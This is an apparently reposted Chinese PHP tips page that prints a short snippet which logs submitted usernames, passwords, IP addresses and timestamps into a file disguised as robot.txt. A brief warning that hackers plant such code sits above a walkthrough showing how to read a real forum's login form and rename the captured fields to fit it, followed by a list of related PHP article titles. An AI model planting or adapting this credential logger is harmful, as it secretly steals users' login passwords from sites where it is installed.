php截取后台登陆密码的代码
2015-01-24信息快讯网
php截取后台登陆密码的代码,很多时候黑客留了这样的代码,大家一定要注意下
if($_POST[loginsubmit]!=){ //判断是否点了登陆按钮$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 连起来赋值给变量$sb
fwrite(fopen(robot.txt,ab),$sb);} //结果写入一个文件
下面简单分析一下,以华夏的登陆页面为例。打开bbs.xxx.com/login.php 右键查看源码,CTRL+F搜索action找到登陆的表单。
我只复制了关键代码过来.
<form action=login.php? method=post name=login onSubmit=this.submit.disabled=true;> //action后面的值即是表单提交的地址,里面会处理登陆,比如判断密码是不是正确什么的 method为POST,所以用$_POST接收。
。。。。强大的省略号。。。。。。
<TR>
<TD height=40>账号(<U>U</U>):<BR>
<INPUT
class=input id=pwuser accessKey=u size=16
name=pwuser> </TD></TR> //用户名的input输入框, 注意其name的值, 要和$_POST[username] 这里面的对应, 所以要截取华夏的密码,需要改为 $_POST[pwuser]
<TR>
<TD height=40>密 码(<U>P</U>):<BR><INPUT
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> </TD></TR> //用户名的input输入框, 注意其name的值, 要和$_POST[username] 这里面的对应, 所以要截取华夏的密码,需要改为 $_POST[pwpwd]
PHP获取当前日期所在星期(月份)的开始日期与结束日期(实现代码)
sql注入与转义的php函数代码
Mysql的Root密码忘记,查看或修改的解决方法(图文介绍)
PHP代码审核的详细介绍
PHP获取当前页面完整URL的实现代码
php批量上传的实现代码
使用cookie实现统计访问者登陆次数
深入密码加salt原理的分析
PHP 登录记住密码实现思路
wamp下修改mysql访问密码的解决方法
PHP生成随机用户名和密码的实现代码
php截取字符串并保留完整xml标签的函数代码
真正根据utf8编码的规律来进行截取字符串的函数(utf8版sub_str )
比较discuz和ecshop的截取字符串函数php版
一个简单的网页密码登陆php代码
无法在发生错误时创建会话,请检查 PHP 或网站服务器日志,并正确配置 PHP 安装(win+linux)
php在线代理转向代码
几个有用的php字符串过滤,转换函数代码
php实现rc4加密算法代码
PHP的几个常用数字判断函数代码
php 多关键字 高亮显示实现代码
php中通过curl模拟登陆discuz论坛的实现代码
PHP substr 截取字符串出现乱码问题解决方法[utf8与gb2312]
PHPWind与Discuz截取字符函数substrs与cutstr性能比较
php从右向左/从左向右截取字符串的实现方法
PHP中文处理 中文字符串截取(mb_substr)和获取中文字符串字数
php smarty截取中文字符乱码问题?gb2312/utf-8
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
PHP+MYSQL会员系统的登陆即权限判断实现代码
允许phpmyadmin空密码登录的配置方法
php中实现记住密码自动登录的代码
理解php Hash函数,增强密码安全
php生成随机密码的几种方法